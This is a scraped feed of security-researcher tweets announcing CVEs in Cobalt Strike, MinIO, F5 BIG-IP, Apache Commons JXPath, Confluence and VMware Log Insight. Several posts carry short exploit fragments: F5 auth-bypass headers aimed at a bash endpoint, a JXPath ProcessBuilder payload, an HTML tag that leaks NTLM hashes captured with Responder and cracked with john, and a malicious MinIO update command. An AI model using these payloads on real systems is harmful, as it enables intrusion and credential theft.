Jas502n

#CVE-2022-39197 Cobalt Strike RCE =< 4.7 use codeql to search exploit chain from the database compiled by openjdk and cobaltstrike4.5 db org.apache.batik.swing.JSVGCanvas#setURI org.apache.batik.bridge.BaseScriptingEnvironment#loadScript

New blog post: Cobalt Strike and YARA - Can I have your signature? cobaltstrike.com/blog/cobalt-st…

Converting PPLFault (original: github.com/gabriellandau/…) has been one of the more difficult BOF converts, but was still pretty fun to tackle :)

Cobatstrike4.8更新了，优化了一些基本后渗透的功能，也没什么能大改的了，除非换个logo cobaltstrike.com/blog/cobalt-st…

@joel_land docker-compose.yml set env MINIO_UPDATE_MINISIGN_PUBKEY: github.com/AbelChe/evil_m… example: environment: MINIO_UPDATE_MINISIGN_PUBKEY:

@jas502n How do you get past the signature verification? This is an attempt to update from minio.RELEASE.2022-03-17T06-34-49Z:

#RCE for #CVE-2023-28434 MinIO unauthorized to CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w " -trimpath mc admin update node1 http://x:80/minio.RELEASE.2023-03-22T06-36-24Z.sha256sum -y github.com/AbelChe/evil_m…

#CVE-2023-28432 minio Information Disclosure in Cluster Deployment

Our technical deep-dive blog post for the recent #VMware vRealize Log Insight RCE vulnerability chain leading to root privileges. 💥CVE-2022-31704, CVE-2022-31706, CVE-2022-31711 💥POC exploit in post horizon3.ai/vmware-vrealiz…

Let's explore how we turned a path traversal affecting binwalk into arbitrary code execution - onekey.com/blog/security-…

New blog post on a recent collab with @UsmanMansha420 where I bypassed Akamai WAF to get RCE on a Java application with Spring EL injection. Spent some time writing about the process of constructing the custom payload. Hope you enjoy! h1pmnh.github.io/post/writeup_s…

#CVE-2022-41828 amazon-redshift-jdbc-driver <=2.1.0.7 RCE

#CVE-2022-41852 Apache Commons JXPath RCE context.getValue("start(java.lang.ProcessBuilder.new('calc'))") <dependency> <groupId>commons-beanutils</groupId> <artifactId>commons-beanutils</artifactId> </dependency>

#CVE-2022-39197 Cobalt Strike <html>< img src='file://x.x.x.x/netntlm2'%> python3 Responder.py -I eth0 john --format=netntlmv2 --wordlist=pass.txt creds.txt

#CVE-2022-39197 Cobalt Strike <=4.7 RCE cobaltstrike.com/blog/out-of-ba…

@rinz0h :)

@jas502n That's what you get for tryong to get cracked software 😆

⚠️ Don't buy anything from Zer0Day Lab channels, its a warning before you get scam! telegra.ph/Zer0Day-Are-Sc…

#CVE-2022-26134 Atlassian Confluence RCE boolean authenticate(String username, String password)

#CVE-2022-1388 F5's BIG-IP Unauth RCE Connection: keep-alive, X-F5-Auth-Token Authorization: Basic YWRtaW46 X-F5-Auth-Token: anything https://x.x.x.x:443/mgmt/tm/util/bash

🔥 We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP. Successful exploitation could lead to RCE from an unauthenticated user. Patch ASAP!